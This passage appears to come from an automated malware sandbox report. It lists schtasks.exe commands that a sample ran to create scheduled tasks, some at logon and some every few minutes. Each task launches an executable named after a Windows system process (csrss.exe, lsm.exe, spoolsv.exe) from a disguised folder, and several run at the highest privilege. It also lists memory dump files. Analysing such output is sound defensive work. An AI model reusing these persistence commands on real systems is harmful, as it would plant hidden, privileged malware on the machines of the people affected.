                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2820
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Uninstall Information\spoolsv.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2972
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\csrss.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2752
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\csrss.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2808
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\csrss.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:316
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe'" /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2952
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:584
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Office\Stationery\1033\lsm.exe'" /rl HIGHEST /f
                                          1⤵
                                          • Process spawned unexpected child process
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1852

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Downloads


                                          1.1MB

                                        • memory/2476-610-0x0000000000150000-0x0000000000260000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2596-83-0x00000000010F0000-0x0000000001200000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/2604-550-0x0000000000220000-0x0000000000330000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/3064-430-0x0000000001180000-0x0000000001290000-memory.dmp

                                          Filesize

                                          1.1MB